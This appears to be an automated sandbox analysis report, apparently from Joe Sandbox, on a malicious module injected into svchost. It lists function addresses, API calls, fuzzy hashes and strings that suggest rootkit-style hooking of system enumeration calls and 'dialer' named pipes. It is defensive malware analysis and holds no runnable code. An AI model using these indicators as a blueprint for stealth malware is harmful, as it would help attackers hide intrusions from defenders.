                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000042.00000002.3070446099.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_66_2_179537a0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: CurrentThread$AddressHandleModuleProc
                                                              • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                              • API String ID: 4175298099-1975688563
                                                              • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                              • Instruction ID: ba4581b48e2ff6b855cacc301ebdcd167c7a3886c66976a807292e1e89fccdae
                                                              • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                              • Instruction Fuzzy Hash: AF315074E299AAA0FE17EF65E8616D46371B70634CFC05023D84D13766AE7C868EC750
                                                              Function 00000179537ACE28 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • GetLastError.KERNEL32 ref: 00000179537ACE37
                                                              • FlsGetValue.KERNEL32(?,?,?,00000179537B0A6B,?,?,?,00000179537B045C,?,?,?,00000179537AC84F), ref: 00000179537ACE4C
                                                              • FlsSetValue.KERNEL32(?,?,?,00000179537B0A6B,?,?,?,00000179537B045C,?,?,?,00000179537AC84F), ref: 00000179537ACE6D
                                                              • FlsSetValue.KERNEL32(?,?,?,00000179537B0A6B,?,?,?,00000179537B045C,?,?,?,00000179537AC84F), ref: 00000179537ACE9A
                                                              • FlsSetValue.KERNEL32(?,?,?,00000179537B0A6B,?,?,?,00000179537B045C,?,?,?,00000179537AC84F), ref: 00000179537ACEAB
                                                              • FlsSetValue.KERNEL32(?,?,?,00000179537B0A6B,?,?,?,00000179537B045C,?,?,?,00000179537AC84F), ref: 00000179537ACEBC
                                                              • SetLastError.KERNEL32 ref: 00000179537ACED7
                                                              • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000179537B0A6B,?,?,?,00000179537B045C,?,?,?,00000179537AC84F), ref: 00000179537ACF0D
                                                              • FlsSetValue.KERNEL32(?,?,00000001,00000179537AECCC,?,?,?,?,00000179537ABF9F,?,?,?,?,?,00000179537A7AB0), ref: 00000179537ACF2C
                                                                • Part of subcall function 00000179537AD6CC: HeapAlloc.KERNEL32 ref: 00000179537AD721
                                                              • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000179537B0A6B,?,?,?,00000179537B045C,?,?,?,00000179537AC84F), ref: 00000179537ACF54
                                                                • Part of subcall function 00000179537AD744: HeapFree.KERNEL32 ref: 00000179537AD75A
                                                                • Part of subcall function 00000179537AD744: GetLastError.KERNEL32 ref: 00000179537AD764
                                                              • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000179537B0A6B,?,?,?,00000179537B045C,?,?,?,00000179537AC84F), ref: 00000179537ACF65
                                                              • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000179537B0A6B,?,?,?,00000179537B045C,?,?,?,00000179537AC84F), ref: 00000179537ACF76
                                                              Memory Dump Source
                                                              • Source File: 00000042.00000002.3070446099.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_66_2_179537a0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: Value$ErrorLast$Heap$AllocFree
                                                              • String ID:
                                                              • API String ID: 570795689-0
                                                              • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                              • Instruction ID: 77b7efc725698ca54b94f8a3bbd63b6bf6571e27a76a959dc314b8d8e9e59c42
                                                              • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                              • Instruction Fuzzy Hash: FA41D370F2C27951FA2BA73149553E923B15B477BCF1C4737A83E867DADE28C4494200
                                                              Function 00000179537A2244 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000042.00000002.3070446099.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_66_2_179537a0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                              • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                              • API String ID: 2171963597-1373409510
                                                              • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                              • Instruction ID: bf197e0ffd1960bdac6007c57ce7df944ff2740a99a669adc726ba4408a275dc
                                                              • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                              • Instruction Fuzzy Hash: 06214F32A1876482FB118B25F45479973B1F78ABA8F504216EB9D03BA8DF3CC14DCB04
                                                              Function 00000179537AA544 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 620 179537aa544-179537aa5ac call 179537ab414 623 179537aaa13-179537aaa1b call 179537ac748 620->623 624 179537aa5b2-179537aa5b5 620->624 624->623 625 179537aa5bb-179537aa5c1 624->625 627 179537aa5c7-179537aa5cb 625->627 628 179537aa690-179537aa6a2 625->628 627->628 632 179537aa5d1-179537aa5dc 627->632 630 179537aa963-179537aa967 628->630 631 179537aa6a8-179537aa6ac 628->631 635 179537aa969-179537aa970 630->635 636 179537aa9a0-179537aa9aa call 179537a9634 630->636 631->630 633 179537aa6b2-179537aa6bd 631->633 632->628 634 179537aa5e2-179537aa5e7 632->634 633->630 638 179537aa6c3-179537aa6ca 633->638 634->628 639 179537aa5ed-179537aa5f7 call 179537a9634 634->639 635->623 640 179537aa976-179537aa99b call 179537aaa1c 635->640 636->623 646 179537aa9ac-179537aa9cb call 179537a7940 636->646 643 179537aa894-179537aa8a0 638->643 644 179537aa6d0-179537aa707 call 179537a9a10 638->644 639->646 654 179537aa5fd-179537aa628 call 179537a9634 * 2 call 179537a9d24 639->654 640->636 643->636 647 179537aa8a6-179537aa8aa 643->647 644->643 658 179537aa70d-179537aa715 644->658 651 179537aa8ac-179537aa8b8 call 179537a9ce4 647->651 652 179537aa8ba-179537aa8c2 647->652 651->652 665 179537aa8db-179537aa8e3 651->665 652->636 657 179537aa8c8-179537aa8d5 call 179537a98b4 652->657 688 179537aa648-179537aa652 call 179537a9634 654->688 689 179537aa62a-179537aa62e 654->689 657->636 657->665 662 179537aa719-179537aa74b 658->662 667 179537aa751-179537aa75c 662->667 668 179537aa887-179537aa88e 662->668 669 179537aa9f6-179537aaa12 call 179537a9634 * 2 call 179537ac6a8 665->669 670 179537aa8e9-179537aa8ed 665->670 667->668 671 179537aa762-179537aa77b 667->671 668->643 668->662 669->623 673 179537aa8ef-179537aa8fe call 179537a9ce4 670->673 674 179537aa900 670->674 675 179537aa874-179537aa879 671->675 676 179537aa781-179537aa7c6 call 179537a9cf8 * 2 671->676 684 179537aa903-179537aa90d call 179537ab4ac 673->684 674->684 680 179537aa884 675->680 701 179537aa804-179537aa80a 676->701 702 179537aa7c8-179537aa7ee call 179537a9cf8 call 179537aac38 676->702 680->668 684->636 699 179537aa913-179537aa961 call 179537a9944 call 179537a9b50 684->699 688->628 705 179537aa654-179537aa674 call 179537a9634 * 2 call 179537ab4ac 688->705 689->688 693 179537aa630-179537aa63b 689->693 693->688 698 179537aa63d-179537aa642 693->698 698->623 698->688 699->636 709 179537aa87b 701->709 710 179537aa80c-179537aa810 701->710 720 179537aa815-179537aa872 call 179537aa470 702->720 721 179537aa7f0-179537aa802 702->721 726 179537aa676-179537aa680 call 179537ab59c 705->726 727 179537aa68b 705->727 711 179537aa880 709->711 710->676 711->680 720->711 721->701 721->702 730 179537aa686-179537aa9ef call 179537a92ac call 179537aaff4 call 179537a94a0 726->730 731 179537aa9f0-179537aa9f5 call 179537ac6a8 726->731 727->628 730->731 731->669
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000042.00000002.3070446099.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_66_2_179537a0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                              • String ID: csm$csm$csm
                                                              • API String ID: 849930591-393685449
                                                              • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                              • Instruction ID: 48bad793c3cf8a064d8991e65e6d6caa703c72e63802b69e7c4d4fa44d5e9957
                                                              • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                              • Instruction Fuzzy Hash: DCE18E72A28BA48AEBA2DF65D4803DD77B0F746B9CF100116EE8D57B95CB34C599CB00
                                                              Function 00000179537AF394 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000042.00000002.3070446099.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_66_2_179537a0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: AddressFreeLibraryProc
                                                              • String ID: api-ms-$ext-ms-
                                                              • API String ID: 3013587201-537541572
                                                              • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                              • Instruction ID: 6d28e7484422e4a57a06ac6147cde09464f9819a0b3aea55b6358727e73b2730
                                                              • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                              • Instruction Fuzzy Hash: 3C41B532B2DA2091FB17DB66AC147D523B1BB46BA8F1941279D2E87784EF38C44DC324
                                                              Function 00000179537A104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000042.00000002.3070446099.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_66_2_179537a0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                              • String ID: d
                                                              • API String ID: 3743429067-2564639436
                                                              • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                              • Instruction ID: 4d0dabdc3bb95f01b52548fecc3f9169e00d7fa873fa5b6aedad960dda8fc516
                                                              • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                              • Instruction Fuzzy Hash: 8E416C73618B94C6E761CF21E45479A77B1F389B9CF44812AEB8947B58EF38C489CB00
                                                              Function 00000179537AD068 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • FlsGetValue.KERNEL32(?,?,?,00000179537AC7DE,?,?,?,?,?,?,?,?,00000179537ACF9D,?,?,00000001), ref: 00000179537AD087
                                                              • FlsSetValue.KERNEL32(?,?,?,00000179537AC7DE,?,?,?,?,?,?,?,?,00000179537ACF9D,?,?,00000001), ref: 00000179537AD0A6
                                                              • FlsSetValue.KERNEL32(?,?,?,00000179537AC7DE,?,?,?,?,?,?,?,?,00000179537ACF9D,?,?,00000001), ref: 00000179537AD0CE
                                                              • FlsSetValue.KERNEL32(?,?,?,00000179537AC7DE,?,?,?,?,?,?,?,?,00000179537ACF9D,?,?,00000001), ref: 00000179537AD0DF
                                                              • FlsSetValue.KERNEL32(?,?,?,00000179537AC7DE,?,?,?,?,?,?,?,?,00000179537ACF9D,?,?,00000001), ref: 00000179537AD0F0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000042.00000002.3070446099.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_66_2_179537a0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: Value
                                                              • String ID: 1%$Y%
                                                              • API String ID: 3702945584-1395475152
                                                              • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                              • Instruction ID: b0a3c49dc6ef7a53409216961fbfbc30d008a76d59ac91324fc92d9a86fd0cd9
                                                              • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                              • Instruction Fuzzy Hash: C311C870F2C26841FA6B673699613EA63715B473FCF144337A83D477EADE28C54A8200
                                                              Function 00000179537A7510 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000042.00000002.3070446099.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_66_2_179537a0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                              • String ID:
                                                              • API String ID: 190073905-0
                                                              • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                              • Instruction ID: 03549ce5a8bfb50d1d2883e7ce9a3f420bf030cad668bfca8cca14f47c08375e
                                                              • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                              • Instruction Fuzzy Hash: CD81B531E2C2E146FB57ABA994513D923F2AB4778CF5444A7EA4CC7796EB38C44D8700
                                                              Function 00000179537A9DC4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000042.00000002.3070446099.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_66_2_179537a0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: Library$Load$AddressErrorFreeLastProc
                                                              • String ID: api-ms-
                                                              • API String ID: 2559590344-2084034818
                                                              • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                              • Instruction ID: 1c35a6318a95a9f66357ff113d1e6293aa460ab4329f98c61122d8ffc54845e1
                                                              • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                              • Instruction Fuzzy Hash: 5731D832B2E664E1EE13DB02A400BD963F4B74BBA8F5905279D5E47791EF38C45D8300
                                                              Function 00000179537B3DB4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000042.00000002.3070446099.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_66_2_179537a0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                              • String ID: CONOUT$
                                                              • API String ID: 3230265001-3130406586
                                                              • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                              • Instruction ID: 1d5e788c20f4153e52296bcb8cadabdf0028e11074e208d04bdcdd6a952d3e19
                                                              • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                              • Instruction Fuzzy Hash: 1C11C431B18BA482F7518B52E864359B3B4F389FE8F044226EA9E87794EF38C4488744
                                                              Function 00000179537A3790 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000042.00000002.3070446099.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_66_2_179537a0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: CurrentProcessProtectVirtual$HandleModule
                                                              • String ID: wr
                                                              • API String ID: 1092925422-2678910430
                                                              • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                              • Instruction ID: 5fea20ec1214d5790932143d42f439680bcd659adb70575157f6ec8973a68838
                                                              • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                              • Instruction Fuzzy Hash: 76115E36B1875582FF159F52E4186A963B4FB4AB89F44002ADF8D07B54EF3DC509C714
                                                              Function 00000179537A5B30 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000042.00000002.3070446099.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_66_2_179537a0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: Thread$Current$Context
                                                              • String ID:
                                                              • API String ID: 1666949209-0
                                                              • Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                              • Instruction ID: 24d1bd52570d84dc27a6b3ebe3a983c1cff3cda0c085934ba3b1615b2ee42aa2
                                                              • Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                              • Instruction Fuzzy Hash: B5D1A876619B9882DA71DB1AE49039A77B0F3C9B98F100117EACD47BA9DF3CC555CB00
                                                              Function 00000179537A2F04 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000042.00000002.3070446099.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_66_2_179537a0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: Heap$Process$AllocFree
                                                              • String ID: dialer
                                                              • API String ID: 756756679-3528709123
                                                              • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                              • Instruction ID: 59910d8593d4568c8529067d3d7f690041ca8a68c9534a4d3212bb0acc98c89f
                                                              • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                              • Instruction Fuzzy Hash: 12319232B19B65C2FA56DF56E5407AA67B1FB46B88F084022DF8C47B55EF34C4A98700
                                                              Function 00000179537ACFA0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000042.00000002.3070446099.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_66_2_179537a0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: Value$ErrorLast
                                                              • String ID:
                                                              • API String ID: 2506987500-0
                                                              • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                              • Instruction ID: 8609c7cee23a4da2cb73d7b9a2e9104af3180433e72c296c04d1e0e8fdc5031b
                                                              • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                              • Instruction Fuzzy Hash: C811A270B2C26881FA2BA73259653E923715B477FCF144327A83E477DAEE28C5499200
                                                              Function 00000179537A199C Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000042.00000002.3070446099.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_66_2_179537a0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                              • String ID:
                                                              • API String ID: 517849248-0
                                                              • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                              • Instruction ID: 56b2cd84fcc0e7ced0197c83fadfe9882c07905c38d9d912c2a518943b9c5019
                                                              • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                              • Instruction Fuzzy Hash: 51016931B08A5482FB11DB52A8A879963B5F789BC8F888036DE8D43754EF3CC98DC704
                                                              Function 00000179537A36C8 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000042.00000002.3070446099.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_66_2_179537a0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                              • String ID:
                                                              • API String ID: 449555515-0
                                                              • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                              • Instruction ID: d2470d701e98e81108f06155ee65d957e7b349e728d52e6fd90ae972be3b8938
                                                              • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                              • Instruction Fuzzy Hash: DD012D75B1975882FF269B62E86879573B0FB5AB8AF04042ACE8D07754EF3DC50C8704
                                                              Function 00000179537A9005 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 135COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000042.00000002.3070446099.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_66_2_179537a0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                              • String ID: csm$f
                                                              • API String ID: 2395640692-629598281
                                                              • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                              • Instruction ID: 523c0386b4c626f6db8f57a49f1f760a6df895bac009b115f0e0608c5af323b5
                                                              • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                              • Instruction Fuzzy Hash: 0E51B232B2962886EB56DF15E448B9D37B6F347B8CF108126DA0E47788EB75CC59C704
                                                              Function 00000179537A8FE8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000042.00000002.3070446099.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_66_2_179537a0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                              • String ID: csm$f
                                                              • API String ID: 2395640692-629598281
                                                              • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                              • Instruction ID: 296e92441388b6fc06103b0115ebcdacb288d64441a59e498690bc521cbf3a7d
                                                              • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                              • Instruction Fuzzy Hash: 5531E032A2866896E716DF21E84879E37B4F743BCCF148016EE4E43788DB39C968C704
                                                              Function 00000179537A1A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000042.00000002.3070446099.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_66_2_179537a0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: FinalHandleNamePathlstrlen
                                                              • String ID: \\?\
                                                              • API String ID: 2719912262-4282027825
                                                              • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                              • Instruction ID: de33d0b7403191fafe040a8392dc9819e369d541baf2522363be2d8de6ed28d3
                                                              • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                              • Instruction Fuzzy Hash: 65F03C72B1865592FB618F21E8D479A6771F749B8CF848022DA8D46A58EB2CC68DCB00
                                                              Function 00000179537ABC98 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000042.00000002.3070446099.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_66_2_179537a0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                              • String ID: CorExitProcess$mscoree.dll
                                                              • API String ID: 4061214504-1276376045
                                                              • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                              • Instruction ID: f286dd60a5522db936dfed800217cc6c1f6d92c6ac24c710919bdd42c6a300c2
                                                              • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                              • Instruction Fuzzy Hash: 83F09671B2971481FB158B29E8647D96370EB8AB69F54021BCAAE463E4EF3CC44CC300
                                                              Function 00000179537A3044 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000042.00000002.3070446099.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_66_2_179537a0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: CombinePath
                                                              • String ID: \\.\pipe\
                                                              • API String ID: 3422762182-91387939
                                                              • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                              • Instruction ID: bfab23f09705f7b99784b468b9aa13085e235c3ca8d88f22da8ea4acb8ae1034
                                                              • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                              • Instruction Fuzzy Hash: 55F05E70A18BA482EA418F52B92419A6371EB4EFC8F044032EE8E07B18EE3CC4498714
                                                              Function 00000179537A50D0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000042.00000002.3070446099.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_66_2_179537a0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: CurrentThread
                                                              • String ID:
                                                              • API String ID: 2882836952-0
                                                              • Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                              • Instruction ID: 898435458d9111b53b1cdb683c1f8426028e1d60795762d314f968d6b34372fa
                                                              • Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                              • Instruction Fuzzy Hash: EE02A73262DB9486E7A1CB55E49039AB7B1F3C5798F104116EACE87BA9DF7CC458CB00
                                                              Function 00000179537A5710 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
